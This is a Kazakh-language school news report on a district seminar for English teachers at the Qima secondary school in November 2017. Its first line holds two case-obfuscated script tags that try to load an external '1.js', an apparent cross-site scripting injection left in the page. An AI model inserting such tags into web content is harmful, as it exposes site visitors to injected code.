<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.11.2017
Ғ.Әбдірахманұлы атындағы Қима орта мектебінде бүгін, 21-қараша күні, аудандық ағылшын тілі пәні мұғалімдерінің «Ағылшын пәнін беруде оқу ресурстары мен оқытудың жаңа тәсілдерін пайдалану» тақырыбында семинар өткізілді.
Ағылшын тілі мұғалімдері Самурат Н мен Варанкин Е.Ю. әдістемелік көрме мен сәлемдесу ұйымдастырып, бар кәсіби біліктіліктерін көрсете білді.
Үш тілді еркін меңгерген 11 сынып оқушысы - Карина Алтын, тілдердің маңыздылығы жайлы айтып, оқушылар жануарлар достығы туралы ертегіні актерлік шеберлікпен орындап, көрермендерді жылы жүздерімен баурап алды.
Ғ.Әбдірахманұлы атындағы Қима орта мектебінің ағылшын пәні мұғалімдері Самурат Н. 5 сыныпта «Friendship 2» тақырыпта, Варанкин Е.Ю. 1 сыныпта “Polyglot” интеллектуалды ойынын жүргізсе, Өскенбаев атындағы мектебінің ағылшын тілі мұғалімі Аширханова Ш.С. 7 сыныпта «The best places to visit in Kazakhstan» тақырыбында сабақ өткізді.
Кері байланыс тренингтерін аудандық білім беру бөлімінің әдіскері Бактыбаева М.Б. мен аудандық әдістімелік бірлестіктің жетекшісі Мочалова Е.В. жүргізді.
Теориялық бөлімінде Запорожье орта мектебінің ағылшын пәні мұғалімі Жамбулова А.К. «Дарынды балалармен жұмыс істеу жүйесі», Беловод орта мектебінің ұстазы Батырбекова Д.К. іс-тәжірибесімен бөлісіп, Мочалова Е.В. «Оқытуда бедсенді әдістерін пайдалану» тақырыбында коучинг өткізіп, Express publishing, Cambridge, Inter Press, Oxford, Mc Millan баспаларының кітаптары талқыланып, пікірлерімен бөлісті.
Семинар соңында кері байланыс тренингтері жүргізіліп, қорытынды жасалды.